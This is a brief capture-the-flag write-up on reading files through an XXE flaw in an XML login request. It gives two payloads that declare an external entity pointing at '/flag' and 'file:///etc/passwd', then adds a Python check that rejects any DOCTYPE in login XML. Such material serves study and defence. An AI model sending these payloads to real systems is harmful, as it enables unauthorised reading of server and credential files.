Exploiting an XXE vulnerability to read files
Reference: https://www.jianshu.com/p/4fc721398e97
First, look at the login page source code:
The challenge can be solved by exploiting an XXE vulnerability to read files.
First, capture the login request with Burp Suite:
Then construct an XXE payload that reads the file.
The payload is as follows:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "/flag">
]>
<user>
<username>&f;</username>
<password>024b87931a03f738fff6693ce0a78c88</password>
</user>
Generic template (reading /etc/passwd):
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
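A defender-side check for the login request shape shown above, added here as an example and not part of the original write-up: the login XML has no legitimate reason to carry a DTD, so any DOCTYPE is rejected before the document reaches the parser. The sample request bodies are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the XXE payload shape discussed on this page
XXE_LOGIN = """<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<user><username>&f;</username><password>x</password></user>"""

# Constructed sample: a normal login request
BENIGN_LOGIN = """<?xml version="1.0"?>
<user><username>alice</username><password>x</password></user>"""

# A DTD (and therefore any ENTITY declaration) can only appear inside a DOCTYPE.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when a login document carries a DTD."""


def parse_login(xml_text):
    """Reject any document that declares a DTD, then parse the login fields.

    Returns a dict with the username and password elements' text.
    """
    if DOCTYPE_RE.search(xml_text):
        raise UnsafeXMLError("DOCTYPE/DTD is not allowed in login XML")
    root = ET.fromstring(xml_text)
    return {
        "username": root.findtext("username"),
        "password": root.findtext("password"),
    }


def is_xxe_attempt(xml_text):
    """Detection helper: True when the request body would be refused as XXE."""
    try:
        parse_login(xml_text)
    except UnsafeXMLError:
        return True
    return False


if __name__ == "__main__":
    print("XXE payload flagged:", is_xxe_attempt(XXE_LOGIN))
    print("Benign login parsed:", parse_login(BENIGN_LOGIN))
```

The same DOCTYPE check applied to captured request bodies (for example, logged Burp traffic) will flag attempts like the payload above regardless of which file the entity points at.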